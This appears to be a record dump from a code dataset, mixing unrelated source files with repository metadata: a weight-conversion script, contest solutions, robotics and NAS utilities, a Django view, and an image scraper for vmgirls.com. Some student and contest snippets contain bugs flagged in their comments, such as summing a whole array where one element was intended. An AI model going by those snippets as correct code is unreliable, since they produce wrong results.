		# Conv followed by its BatchNorm, as produced by M.ConvLayer(batch_norm=True).
		res = []
		res.append(get_conv(l1 + '.conv', l2, bias=bias))
		res.append(get_bn(l1 + '.bn', l2 + '_bn'))
		return res
	def get_unit(l1, l2, sc=False):
		# One bottleneck Unit; sc adds the projection-shortcut conv.
		res = []
		res.append(get_bn(l1+'.bn0', l2+'_bn1'))
		res.append(get_conv(l1+'.c1.conv', l2+'_conv1'))
		res.append(get_bn(l1+'.c1.bn', l2+'_bn2'))
		res.append(get_conv(l1+'.c2.conv', l2+'_conv2'))
		res.append(get_bn(l1+'.c2.bn', l2+'_bn3'))
		res.append(get_conv(l1+'.c3.conv', l2+'_conv3'))
		if sc:
			res.append(get_conv(l1+'.sc.conv', l2+'_sc'))
		return res
	def get_stage(l1, l2, blocknum):
		# A residual stage: unit indices are 0-based in torch, 1-based in mxnet.
		res = []
		for i in range(blocknum):
			res += get_unit(l1+'.units.%d'%i, l2+'_unit%d'%(i+1), sc= i==0)
		return res
	def get_dethead(l1, l2):
		# SSH detection head: direct branch + two context convs.
		res = []
		res += get_convbn(l1+'.c11', l2+'_conv1', bias=True)
		res += get_convbn(l1+'.c21', l2+'_context_conv1', bias=True)
		res += get_convbn(l1+'.c22', l2+'_context_conv2', bias=True)
		res += get_convbn(l1+'.c31', l2+'_context_conv3_1', bias=True)
		res += get_convbn(l1+'.c32', l2+'_context_conv3_2', bias=True)
		return res
	def get_regress(l1, l2):
		# Prediction head: l2 is a format string taking the output kind.
		res = []
		res.append(get_conv(l1+'.c1.conv', l2%('cls_score'), bias=True))
		res.append(get_conv(l1+'.c2.conv', l2%('bbox_pred'), bias=True))
		res.append(get_conv(l1+'.c3.conv', l2%('landmark_pred'), bias=True))
		return res
	def totonoi(l):
		# Flatten the list of (torch names, mxnet names) pairs into two flat lists.
		# print(l)
		a = []
		b = []
		for i in l:
			a += i[0]
			b += i[1]
		return a,b
	# Build the full mapping in network order: stem, stages, FPN/SSH branches.
	l = []
	l.append(get_bn('bn0', 'bn_data'))
	l.append(get_conv('c1.conv', 'conv0'))
	l.append(get_bn('c1.bn', 'bn0'))
	l += get_stage('stage1', 'stage1', 3)
	l += get_stage('stage2', 'stage2', 4)
	l += get_stage('stage3', 'stage3', 6)
	l += get_stage('stage4', 'stage4', 3)
	l.append(get_bn('bn1', 'bn1'))
	l += get_convbn('ssh_c3_lateral', 'ssh_c3_lateral', bias=True)
	l += get_dethead('det3', 'ssh_m3_det')
	l += get_regress('head32', 'face_rpn_%s_stride32')
	l += get_convbn('ssh_c2_lateral', 'ssh_c2_lateral', bias=True)
	l += get_convbn('ssh_c2_aggr', 'ssh_c2_aggr', bias=True)
	l += get_dethead('det2', 'ssh_m2_det')
	l += get_regress('head16', 'face_rpn_%s_stride16')
	l += get_convbn('ssh_m1_red_conv', 'ssh_m1_red_conv', bias=True)
	l += get_convbn('ssh_c1_aggr', 'ssh_c1_aggr', bias=True)
	l += get_dethead('det1', 'ssh_m1_det')
	l += get_regress('head8', 'face_rpn_%s_stride8')
	a,b = totonoi(l)
	# print(a,b)
	# `source` exposes the mxnet weights as res[name] -> NDArray.
	import source
	for i,j in zip(a,b):
		# print(i,j)
		value = source.res[j].asnumpy()
		# print(value.shape)
		# print(res[i].shape)
		# In-place copy so the torch tensor keeps its identity in the module.
		res[i].data[:] = torch.from_numpy(value)[:]
	# net.bn_eps(2e-5)
	# Sanity forward with the copied weights, then persist.
	y = net(x)
	print(y[0])
	print(y[0].shape)
	M.Saver(net).save('./model_r50/r50_retina.pth')
|
[
"[email protected]"
] | |
46bd95d09f6bc8aecede6db2b326fc90533f3af9
|
45467e07e77131f631d0865046dcc4d18f483601
|
/src/Hackerearth/round_2/A.py
|
a766bae20c7b6478ffb22d212ff53cd5256fddb7
|
[] |
no_license
|
bvsbrk/Algos
|
98374e094bd3811579276d25a82bbf2c0f046d96
|
cbb18bce92054d57c0e825069ef7f2120a9cc622
|
refs/heads/master
| 2021-09-25T10:01:59.323857 | 2018-10-20T16:07:07 | 2018-10-20T16:07:07 | 98,708,839 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 805 |
py
|
if __name__ == '__main__':
    # Each test case: n, then n integers. The list is reversed so index 0 is
    # the LAST value read; zeros at that end are then skipped.
    for _ in range(int(input().strip())):
        n = int(input().strip())
        x = n  # remaining-entry counter; NOTE(review): decremented but never used
        arr = [int(i) for i in input().strip().split()]
        arr = arr[::-1]
        i = 0
        # NOTE(review): the index is evaluated before the bounds check, so an
        # all-zero input raises IndexError here.
        while arr[i] == 0 and i < n:
            i += 1
            x -= 1
        if i == n - 1:
            print(0)
        else:
            ans = []
            # First answer: sign of the first non-zero entry.
            if arr[i] > 0:
                ans.append(1)
            else:
                ans.append(-1)
            # neg sgn
            # Second answer: same sign for even n, opposite sign for odd n.
            if n % 2 == 0:
                if arr[i] > 0:
                    ans.append(1)
                else:
                    ans.append(-1)
            else:
                if arr[i] < 0:
                    ans.append(1)
                else:
                    ans.append(-1)
            print(*ans)
|
[
"[email protected]"
] | |
6ce151591e20779df71ce25110bc3831ce51c59a
|
b792f600ed4e50f34e65e4f334cf7a32d319cc0e
|
/2017/day11.py
|
cf2d1b7780f769b1e96bacb18b46b9ecb825122d
|
[] |
no_license
|
daniel70/AoC
|
d577f490559d4a0f0d24567bd796117e1aac94ec
|
ef704a4f6e90168cdc2a91e894583a96e9a6c371
|
refs/heads/master
| 2022-12-28T03:19:08.341913 | 2022-12-16T01:52:39 | 2022-12-18T01:30:50 | 224,876,724 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 711 |
py
|
# Hex moves on a doubled-ish coordinate system: n/s shift a full unit
# vertically, the four diagonals shift one column and half a row.
directions = {
    'n': (0, 1),
    'ne': (1, 0.5),
    'se': (1, -0.5),
    's': (0, -1),
    'sw': (-1, -0.5),
    'nw': (-1, 0.5),
}


def distance(instructions: list[str]) -> tuple[int, int]:
    """Follow the hex moves; return (final distance, furthest distance seen).

    Distance from the origin is |x| plus whatever vertical offset is not
    already covered by the diagonal component of the horizontal moves.
    """
    col, row = 0, 0
    furthest = 0
    for move in instructions:
        dc, dr = directions[move]
        col += dc
        row += dr
        x, y = col, row
        here = abs(x) + max(int(abs(y)) - abs(x) // 2, 0)
        if here > furthest:
            furthest = here
    steps = abs(x) + max(int(abs(y)) - abs(x) // 2, 0)
    return steps, furthest
return steps, furthest
# Entry point: day 11 puzzle input is one comma-separated line of moves.
instructions = open("input11.txt").read().strip().split(",")
answer1, answer2 = distance(instructions=instructions)
print("answer 1:", answer1)
print("answer 2:", answer2)
|
[
"[email protected]"
] | |
5432391a83b8c960663d3cef2f2aa55994ff307a
|
c4bfd8ba4c4c0f21bd6a54a9131f0985a5a4fa56
|
/crescent/functions/get_att.py
|
704a83a8c9e664be800a85836e5778252c98e7a2
|
[
"Apache-2.0"
] |
permissive
|
mpolatcan/crescent
|
405936ec001002e88a8f62d73b0dc193bcd83010
|
2fd0b1b9b21613b5876a51fe8b5f9e3afbec1b67
|
refs/heads/master
| 2022-09-05T04:19:43.745557 | 2020-05-25T00:09:11 | 2020-05-25T00:09:11 | 244,903,370 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 528 |
py
|
from .fn import Fn as AnyFn, FnArrayValue
from typing import Union
class GetAtt(FnArrayValue):
    """CloudFormation ``Fn::GetAtt`` intrinsic: [logical resource id, attribute]."""
    def __init__(self):
        # Field order matters: Fn::GetAtt serialises as [Resource, Attribute].
        super(GetAtt, self).__init__(
            fn_name=GetAtt.__name__,
            field_order=[self.Resource.__name__, self.Attribute.__name__]
        )
    def Resource(self, resource_id: Union[str, AnyFn]):
        # Logical ID of the resource whose attribute is fetched.
        return self._set_field(self.Resource.__name__, resource_id)
    def Attribute(self, attribute: Union[str, AnyFn]):
        # Name of the attribute to read from that resource.
        return self._set_field(self.Attribute.__name__, attribute)
|
[
"[email protected]"
] | |
6e3877952188cded94c414eb37f6d19ebeb95534
|
5462142b5e72cb39bea5b802dd46f55357c4ea84
|
/test_pic/vmgirls/dl_vmgirls_pic.py
|
499ac3f8cef5a386fe97d91b59fd55f04f358de3
|
[] |
no_license
|
qqmadeinchina/myhomeocde
|
a0996ba195020da9af32613d6d2822b049e515a0
|
291a30fac236feb75b47610c4d554392d7b30139
|
refs/heads/master
| 2023-03-23T05:28:53.076041 | 2020-08-24T08:39:00 | 2020-08-24T08:39:00 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,874 |
py
|
# -*- coding: utf-8 -*-
# @time :2020/8/17 9:56
# @Author:老萝卜
# @file:dl_vmgirls_pic
# @Software:%{PRODUICT_NAME}
'''
爬取https://www.vmgirls.com/所有图片
'''
import time
import requests
from lxml import etree
import os
import json
basepath_picsave="e:\\temp\\pythontest\\vmgirls\\"  # root folder the pictures are saved under

# Browser-like User-Agent so the site does not reject the scraper outright.
headers={
    "user-agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36"
}

# Timestamps captured once at import time, reused when building file names.
sysdatetime=time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))
sysdate=time.strftime('%Y-%m-%d',time.localtime(time.time()))
systime=time.strftime('%H:%M:%S',time.localtime(time.time()))
# Fix: the original wrote '==' (a comparison) instead of '=', so this name
# was never bound and the module crashed with a NameError on import.
sysdatetime_compact=time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))
# Persist text content to a file.
def save_html(content, path, oprtye="a", encode="utf-8"):
    """Write *content* to *path*; mode defaults to append, encoding to UTF-8."""
    out = open(path, oprtye, encoding=encode)
    try:
        out.write(content)
    finally:
        out.close()
# Step 1: hit the network and return the decoded response body.
def get_page(url,encode="utf-8"):
    """Fetch *url* with the scraper headers; decode the body with *encode*."""
    html = requests.get(url,headers=headers).content.decode(encode) # decode with the site's charset, otherwise the text comes out garbled
    return html
# Parse the landing page: collect the unique per-gallery detail-page URLs.
def xpath_toppage(response):
    """Return deduplicated absolute URLs of every gallery linked on the home page."""
    pageslist=[]
    html=etree.HTML(response)
    # a_list=html.xpath("/a")
    # # save the raw <a></a> markup for inspection
    # temp_list=[]
    # for item in a_list:
    #     str0=etree.tostring(item,encoding="utf-8").decode("utf-8")
    #     temp_list.append(str0)
    # temp_str="\n".join(temp_list)
    # save_html(temp_str,"page_a_content.txt","w")
    urllist=html.xpath("//a[@class='media-content']/@href")
    for url in urllist:
        # hrefs are relative; prefix the site root and drop duplicates.
        newurl = "https://www.vmgirls.com/" + url
        if newurl not in pageslist:
            pageslist.append(newurl)
    return pageslist
# Create a single directory level if it is missing.
def createdir(dir_name):
    """Make *dir_name* (like os.mkdir) unless it already exists."""
    if os.path.exists(dir_name):
        return
    os.mkdir(dir_name)
# Parse one gallery page: extract the title and image URLs, and create the
# local download directory for it.
def xpath_pages(response):
    """Return (local save dir, list of image hrefs) for one gallery page."""
    pagelist = []  # NOTE(review): unused
    html = etree.HTML(response)
    title=html.xpath("//h1[@class='post-title h3']/text()")[0]
    author=html.xpath("//a[@class='author-popup']/text()")  # NOTE(review): unused
    # urllist=html.xpath("//a[class='nc-light-gallery-item']/@href")
    # Image anchors carry the gallery title as their title attribute.
    urllist=html.xpath(f"//a[@title='{title}']/@href")
    # print("author=",author)
    # print("urllist=",urllist)
    savepath=basepath_picsave+title+"\\"
    createdir(savepath)
    return (savepath,urllist)
def savepic(filepath,url):
    """Download *url* and write the raw bytes to *filepath*."""
    req = requests.get(url,headers=headers)
    with open(filepath, "wb") as file:
        file.write(req.content)
def savejson(data, filepath, oprtype="a", encode="utf-8"):
    """Serialise *data* as JSON into *filepath* (append mode by default)."""
    fjson = open(filepath, oprtype, encoding=encode)
    try:
        json.dump(data, fjson)
    finally:
        fjson.close()
def main():
    """Scrape vmgirls.com: archive the landing page, walk every gallery,
    record (local path, image url) pairs to a JSON file, then download all."""
    url="https://www.vmgirls.com/"
    response=get_page(url)
    # Keep a dated snapshot of the landing page for debugging.
    save_html(response,f".\\www.vmgirls.com.{sysdate}.html","w")
    if response=="":
        print("网页打开失败")
        return
    pageslist=xpath_toppage(response)
    # print("pageslist=",pageslist)
    picurllist=[]
    for picsurl in pageslist:
        resp = get_page(picsurl)
        save_html(resp,"1.html","w")  # overwritten each iteration (debug aid)
        picpath,urllist=xpath_pages(resp)
        # print("urllist=",urllist)
        for picurl in urllist:
            # Local file keeps the original basename of the image URL.
            filename=picpath+picurl.split("/")[-1]
            picurl1="https://www.vmgirls.com/"+picurl
            picurllist.append((filename,picurl1))
            # print("picurllist=", picurllist)
            # print("(filename,picurl1)=",filename,picurl1)
    # print("picurllist=",picurllist)
    # temp_str="\n".join(picurllist)
    # save_html(temp_str,"urllist","w")
    # The file name embeds a compact timestamp so reruns don't overwrite
    # earlier lists; requires sysdatetime_compact to be bound at module top.
    savejson(picurllist,f"picurllist_{sysdatetime_compact}.json","w")
    # with open("picurllist.json","r") as fjson:
    #     data=json.load(fjson)
    #     print("data=",data)
    for filepath,pic_url in picurllist:
        savepic(filepath,pic_url)
if __name__=="__main__":
    main()
|
[
"[email protected]"
] | |
8114f87ea4d123ce369f1ad9b8352b6eaf865dbf
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03208/s325634445.py
|
323b17ee4ad8a29bda1ed175bcbbe1278f12231d
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 240 |
py
|
def resolve():
    """Read N, K and N heights; print the minimum possible max-min spread
    over K chosen heights — the optimum picks K consecutive values in
    sorted order, so scan windows of width K."""
    n, k = map(int, input().split())
    H_sort = list(sorted([int(input()) for _ in range(n)],reverse=True))
    ans = 10**9
    # Descending order: window [i, i+k-1] has max H_sort[i], min H_sort[i+k-1].
    for i in range(n-k+1):
        ans = min(ans, H_sort[i]-H_sort[i+k-1])
    print(ans)
resolve()
|
[
"[email protected]"
] | |
e2bd9a59636cfd0c2f76a1a4087cc2c5202b1935
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/216/usersdata/274/113966/submittedfiles/av2_p3_civil.py
|
d9f4bcefea50acc8b1dd920d630cdd854f8a3254
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 458 |
py
|
# -*- coding: utf-8 -*-
import numpy as np
# Reads an L x L matrix cell by cell, then computes three partial sums
# relative to position (x, y). NOTE(review): submitted student code — the
# sums below look unfinished/incorrect; annotations flag the issues.
L=int(input("Quantidade de Linhas: "))
C=L  # square matrix: columns == rows
a=np.zeros((L,C))
x=int(input("Linhas: "))
y=int(input("Colunas: "))
for i in range(0,a.shape[0],1):
    for j in range(0,a.shape[1],1):
        a[i,j]=float(input("Valor da Linha: "))
soma1L=0
for i in range(x,C-y,1):
    soma1L=soma1L+a[x,i+1]  # partial sum along row x, columns x+1..C-y
soma2L=0
for i in range(x,y,1):
    soma2L=soma2L+a  # NOTE(review): adds the WHOLE array, not an element — a[x, i] (or similar) was almost certainly intended
soma1C=0
for i in range(x,C-y,1):
    soma1C=soma1C+a[x,i+1]  # NOTE(review): byte-for-byte duplicate of soma1L; a column sum was probably intended
|
[
"[email protected]"
] | |
fe03327e97fff1983eaee4dd0427062b9d600377
|
05cda3ab89d001aef2ec19f2975fad9397c8dd0b
|
/experiments/sawyer/towel_classifier/conf.py
|
bec399b3897f8ecb885707dcf2e8c6335cc1ab37
|
[
"MIT"
] |
permissive
|
dhl8282/visual_foresight
|
ddcc940ad542222d433ca269e37e4d5f747732ea
|
5e6205a85119c1dec4a39ba7e67d7c89e726a47c
|
refs/heads/master
| 2022-09-05T18:16:07.590072 | 2020-05-26T08:41:52 | 2020-05-26T08:41:52 | 266,988,765 | 0 | 0 |
MIT
| 2020-05-26T08:36:22 | 2020-05-26T08:36:22 | null |
UTF-8
|
Python
| false | false | 988 |
py
|
from visual_mpc.video_prediction.setup_predictor import setup_predictor
from visual_mpc.video_prediction.vpred_model_interface import VPred_Model_Interface
from video_prediction.models.savp_model import SAVPVideoPredictionModel
import robonet
modeldir = '/home/sudeep/Documents/video_prediction/pretrained_models/mixed_datasets/towel_hard_objects/view0/'
# Visual-MPC predictor configuration: a SAVP video-prediction model wrapped
# by VPred_Model_Interface and restored from the pretrained checkpoint above.
configuration = {
'pred_model': VPred_Model_Interface,
'pred_model_class': SAVPVideoPredictionModel,
'setup_predictor':setup_predictor,
'json_dir': modeldir + '/model.savp.None',
'pretrained_model':modeldir + '/model.savp.None/model-300000',   # 'filepath of a pretrained model to resume training from.' ,
'sequence_length': 15,      # 'sequence length to load, including context frames.' ,
'context_frames': 2,        # of frames before predictions.' ,
'model': 'appflow',            #'model architecture to use - CDNA, DNA, or STP' ,
'batch_size': 50,
'sdim':8,                     # presumably state dimension — confirm against visual_mpc
'adim':4,                     # presumably action dimension — confirm
'orig_size':[48,64],          # input image (height, width)
'no_pix_distrib': '',
'ncam': 1                     # number of camera views
}
|
[
"[email protected]"
] | |
78278e990a57092f2ec56732405baf87e7f9f84d
|
1fe8d4133981e53e88abf633046060b56fae883e
|
/venv/lib/python3.8/site-packages/tensorflow/python/layers/normalization.py
|
2ff79b4f2e9ffe0a6b49bfc40e106c0aa66daffd
|
[] |
no_license
|
Akira331/flask-cifar10
|
6c49db8485038731ce67d23f0972b9574746c7a7
|
283e7a2867c77d4b6aba7aea9013bf241d35d76c
|
refs/heads/master
| 2023-06-14T16:35:06.384755 | 2021-07-05T14:09:15 | 2021-07-05T14:09:15 | 382,864,970 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 130 |
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:6ba7d44e910c3440fadfac158cda4aa0136a4447c84f005b7144e6cd9b29444d
size 17101
|
[
"[email protected]"
] | |
85ae43871dcc3db57959c181396ab5c178961f2e
|
330285bea42e66b1975d62e2f4dd742d4c3ab360
|
/franka_moveit/scripts/create_demo_planning_scene.py
|
9916a164cc43bf4866b219c232f5d029ec8d94c9
|
[
"Apache-2.0"
] |
permissive
|
justagist/franka_ros_interface
|
946182e0430d21a9c119470729d7ec5e96caa404
|
f1f3649a4b030a9191e0577d980680ec95afa6ab
|
refs/heads/master
| 2021-12-24T22:22:14.599033 | 2021-12-22T13:42:30 | 2021-12-22T13:42:30 | 199,485,892 | 130 | 51 |
Apache-2.0
| 2021-05-03T17:11:32 | 2019-07-29T16:07:08 |
Python
|
UTF-8
|
Python
| false | false | 3,226 |
py
|
#!/usr/bin/env python
# /***************************************************************************
#
# @package: franka_moveit
# @metapackage: franka_ros_interface
# @author: Saif Sidhik <[email protected]>
#
# **************************************************************************/
# /***************************************************************************
# Copyright (c) 2019-2021, Saif Sidhik
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# **************************************************************************/
import sys
import rospy
import moveit_commander
from franka_moveit import ExtendedPlanningSceneInterface
from franka_moveit.utils import create_pose_stamped_msg
"""
A script for creating a simple environment as a PlanningScene. This script runs
by default when interface.launch is started, but can be disabled using argument.
"""
# Static collision boxes describing the IRLab bench around the panda_link0
# frame; each entry is the kwargs for one ExtendedPlanningSceneInterface.add_box
# call (pose of the box centre plus its [x, y, z] size in metres).
IRLab_workspace = [
    {
        'name': 'back_wall',
        'pose': create_pose_stamped_msg(position = [-0.57,0.0,0.5], orientation = [1,0,0,0], frame = 'panda_link0'),
        'size': [0.1,1.8,1]
    },
    {
        'name': 'side_wall',
        'pose': create_pose_stamped_msg(position = [-0.3,-0.85,0.5], orientation = [1,0,0,0], frame = 'panda_link0'),
        'size': [0.6,0.1,1]
    },
    {
        'name': 'table',
        'pose': create_pose_stamped_msg(position = [0.45,-0.0,0], orientation = [1,0,0,0], frame = 'panda_link0'),
        'size': [2,1.8,0.02]
    },
    {
        'name': 'controller_box',
        'pose': create_pose_stamped_msg(position = [-0.37,0.55,0.08], orientation = [1,0,0,0], frame = 'panda_link0'),
        'size': [0.4,0.6,0.16]
    },
    {
        'name': 'equipment_box',
        'pose': create_pose_stamped_msg(position = [-0.35,-0.68,0.17], orientation = [1,0,0,0], frame = 'panda_link0'),
        'size': [0.46,0.4,0.34]
    }
]
def main():
    """Populate the MoveIt planning scene with the IRLab workspace boxes."""
    try:
        rospy.loginfo("Creating Demo Planning Scene")
        scene = ExtendedPlanningSceneInterface()
        rospy.sleep(1) # ----- Not having this delay sometimes caused failing to create some boxes
        # Add each workspace box, logging per-object success.
        for config in IRLab_workspace:
            rospy.loginfo("-- Creating object: {}..".format(config['name']))
            success = scene.add_box(**config)
            rospy.loginfo("------ {}".format("success" if success else "FAILED!"))
        rospy.loginfo("Created Demo Planning Scene.")
    except rospy.ROSInterruptException:
        return
    except KeyboardInterrupt:
        return
if __name__ == '__main__':
    rospy.init_node('simple_scene_creator',
                    anonymous=True)
    moveit_commander.roscpp_initialize(sys.argv)
    main()
|
[
"[email protected]"
] | |
c9905c4f0826bb701e09958514299e45c73b5843
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/173/usersdata/265/86697/submittedfiles/moedas.py
|
a742b7f67e4b1843dcb579ac41fef535ec50768c
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 300 |
py
|
# -*- coding: utf-8 -*-
# Coin-change check: find non-negative counts qa, qb with qa*a + qb*b == c.
# Prints qa then qb for the first solution found, or 'N' if none exists.
a = int(input('digite o valor de a: '))
b = int(input('digite o valor de b: '))
c = int(input('digite o valor de c: '))
# Fixes relative to the original:
#  * `if (((c-(qa*a))%)b==0)` was a syntax error (misplaced parenthesis);
#  * the range now includes qa == c, so solutions with qb == 0 are found;
#  * the remainder must be non-negative, otherwise qb would come out negative.
for qa in range(0, c + 1, 1):
    resto = c - (qa * a)
    if resto >= 0 and resto % b == 0:
        print(qa)
        qb = resto // b
        print(qb)
        break
else:
    # Loop ended without break: no valid (qa, qb) combination.
    print('N')
|
[
"[email protected]"
] | |
ffbb923905cedb23748806a6e5a210f52377acc7
|
c42672aeac984ab3f57d840710e145f4e918ba01
|
/nasws/cnn/search_space/monodepth/analysis.py
|
872b130085e3b8170a5f7d4627a9b3fd1c6b5248
|
[
"MIT"
] |
permissive
|
kcyu2014/nas-landmarkreg
|
00212b6015d1fef3e7198bfa596fa69a898167c2
|
a00c3619bf4042e446e1919087f0b09fe9fa3a65
|
refs/heads/main
| 2023-07-21T19:52:19.392719 | 2021-08-24T09:37:24 | 2021-08-24T09:37:24 | 350,368,390 | 10 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,434 |
py
|
import os
import glob
from collections import defaultdict
from monodepth.utils.reporter import tensorboard_check_tags, tensorboard_load_summary, count_parameters_in_MB_search
from monodepth.utils.checkpointer import load_args
from monodepth.models import MidasNet, MidasNetSearch
from nni.nas.pytorch.fixed import FixedArchitecture
import torch
from monodepth.utils.checkpointer import load_json
from thop import profile
import numpy as np
def sort_tb_pairs(l, ignore_index=True):
    """Order tensorboard (step, value) pairs by step.

    With ignore_index=True (default) return only the value column, as a
    tuple, in step order; otherwise return the sorted list of pairs.
    """
    ordered = sorted(l, key=lambda item: item[0])
    if not ignore_index:
        return ordered
    columns = list(zip(*ordered))
    return columns[1]
def average_last_K(l, top_K=5):
    """Mean of the last *top_K* entries of *l*.

    Note: the divisor is always top_K, matching the original behaviour even
    when fewer than top_K entries exist.
    """
    tail = l[-top_K:]
    return sum(tail) / top_K
def collect_experiment_kdt_from_tensorboard(path):
    """Aggregate one experiment's tensorboard logs under *path* and return
    the sparse KdT / Spearman validation metrics averaged over the last
    5 logged points (see average_last_K)."""
    args = load_args(path + '/args.json')  # NOTE(review): loaded but unused here
    # print(args)
    # store all the results as follow
    tb_paths = glob.glob(path + '/log/*')
    res = defaultdict()  # NOTE(review): no default factory given — behaves like a plain dict
    for p in tb_paths:
        # print(p)
        tags = tensorboard_check_tags(p)
        for t in tags:
            steps, r = tensorboard_load_summary(p, t)
            # Merge (step, value) pairs across multiple event files.
            if t in res:
                res[t] += list(zip(steps, r))
            else:
                res[t] = list(zip(steps, r))
    tag_specified = [
        'validation/sparse_kdt_0.0001',
        'validation/sparse_spr_0.0001']
    final_res = {}
    for tag in tag_specified:
        d = sort_tb_pairs(res[tag])
        final_res[tag] = average_last_K(d)
    return final_res
def collect_experiment_result(path):
    """Collect one experiment's curves, final losses, architecture and size.

    Returns (num_epoch, train_loss, valid_loss, num_param, arch,
    all_train_loss, all_valid_loss).
    """
    # the final evaluation model should be recomputed based on the results over server
    # load args
    args = load_args(path + '/args.json')
    # print(args)
    # store all the results as follow
    tb_paths = glob.glob(path + '/log/*')
    res = defaultdict()
    for p in tb_paths:
        # print(p)
        tags = tensorboard_check_tags(p)
        for t in tags:
            steps, r = tensorboard_load_summary(p, t)
            # accumulate (step, value) pairs across all event files
            if t in res:
                res[t] += list(zip(steps, r))
            else:
                res[t] = list(zip(steps, r))
    # print(res.keys())
    # collect the associated statistics
    num_epoch = len(res['train/sum'])
    # NOTE(review): the next three locals are unused in this function.
    num_channels = 256 # fixed across the entire dataset
    num_cells = 4
    seed = 0
    # store all the intermediate results of 1 run.
    all_train_loss = sort_tb_pairs(res['train/sum'])
    all_valid_loss = sort_tb_pairs(res['validation/ReDWeb'])
    train_loss = average_last_K(sort_tb_pairs(res['train/sum']))
    valid_loss = average_last_K(sort_tb_pairs(res['validation/ReDWeb']))
    # from the current log, this is at is. we do not have more to analyze
    # From this point, we need to get the result from checkpoint and store all the statistics accordingly
    # use this to directly apply
    arch = load_json(path + '/arch.json')
    print('processing architecture ',arch)
    # rebuild the searched model and pin the sampled architecture on it
    model = MidasNetSearch(backbone='resnext101_wsl', args=args)
    mutator = FixedArchitecture(model, arch)
    mutator.reset()
    ckpt_path = path + '/checkpoint.pt'
    if os.path.exists(ckpt_path):
        print('loading checkpoint...')
        checkpoint = torch.load(ckpt_path)
        model.load_state_dict(checkpoint['model'])
        print('finish loading the model ...')
    # count parameters
    num_param = count_parameters_in_MB_search(model, arch)
    return num_epoch, train_loss, valid_loss, num_param, arch, all_train_loss, all_valid_loss
|
[
"[email protected]"
] | |
00868bf5c2508b4f24084132b710bd214998c056
|
524acbbc16eac0ef28da58ff9f79d02d7cadcf1b
|
/backend/shop_time/categories/views.py
|
be8c7d554b3cbf84338a20c5cf0a4fe64763644b
|
[] |
no_license
|
ZandTree/art-shop
|
47eb6ed6f328157c852cef6e324e4be5ab3592f8
|
faa506fb62f845168b9874a720c0b62808245058
|
refs/heads/master
| 2023-06-01T06:40:28.755068 | 2021-06-18T23:53:57 | 2021-06-18T23:53:57 | 376,624,201 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,802 |
py
|
from rest_framework.views import APIView
from .models import Category
from .serializer import CategorySerializer
from rest_framework.permissions import AllowAny
from rest_framework import status
from rest_framework.response import Response
class CategoryList(APIView):
    """Return every category as a one-level tree (roots with their children)."""
    permission_classes = (AllowAny,)

    def get(self, request, format=None):
        """Build the category tree.

        Only one level of nesting is produced: roots (no parent) and their
        direct children. Deeper levels would need a recursive walk.
        """
        if not Category.objects.all().exists():
            # instead of 404 ( server error)
            return Response({'errors': 'No categories found'},
                            status=status.HTTP_500_INTERNAL_SERVER_ERROR)
        categories = Category.objects.all()
        result = []
        for root in categories:
            if root.parent:
                continue
            node = {
                'id': root.id,
                'name': root.name,
                'slug': root.slug,
                'sub_categories': [],
            }
            for child in categories:
                if child.parent and child.parent.id == root.id:
                    node['sub_categories'].append({
                        'id': child.id,
                        'name': child.name,
                        'sub_categories': [],
                    })
            result.append(node)
        return Response({'categories': result}, status=status.HTTP_200_OK)
# def get_queryset(self, queryset=None):
#qs = Category.objects.all()
# TODO
# return queryset
# return queryset.get_cached_trees
|
[
"[email protected]"
] | |
d116cf499ae6b5ea0e40f3a62ee8e3bcd94e6a5e
|
824f19d20cdfa26c607db1ff3cdc91f69509e590
|
/random/strings/345. Reverse Vowels of a String.py
|
88e11095e0c062114eea3783f47a5500cedfc1f9
|
[] |
no_license
|
almamuncsit/LeetCode
|
01d7e32300eebf92ab54c983de6e183242b3c985
|
17aa340649574c37067ec170ceea8d9326be2d6a
|
refs/heads/master
| 2021-07-07T09:48:18.069020 | 2021-03-28T11:26:47 | 2021-03-28T11:26:47 | 230,956,634 | 4 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 689 |
py
|
class Solution:
    def reverseVowels(self, s: str) -> str:
        """Return s with only its vowels reversed; everything else stays put."""
        VOWELS = frozenset('aeiouAEIOU')
        chars = list(s)
